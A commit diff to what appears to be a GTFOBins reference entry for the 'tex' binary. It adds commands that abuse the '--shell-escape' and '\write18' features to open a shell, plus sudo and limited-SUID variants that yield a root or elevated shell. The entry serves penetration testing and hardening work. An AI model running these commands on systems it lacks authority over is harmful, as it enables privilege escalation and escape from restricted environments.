Fix and improve TeX binaries and GNU Octave
This commit is contained in:
@@ -1,6 +1,12 @@
|
||||
description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
tex --shell-escape '\write18{/bin/sh}\end'
|
||||
sudo:
|
||||
- code: |
|
||||
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
||||
tex -interaction=nonstopmode --shell-escape file.tex
|
||||
sudo tex --shell-escape '\write18{/bin/sh}\end'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./tex --shell-escape '\write18{/bin/sh}\end'
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user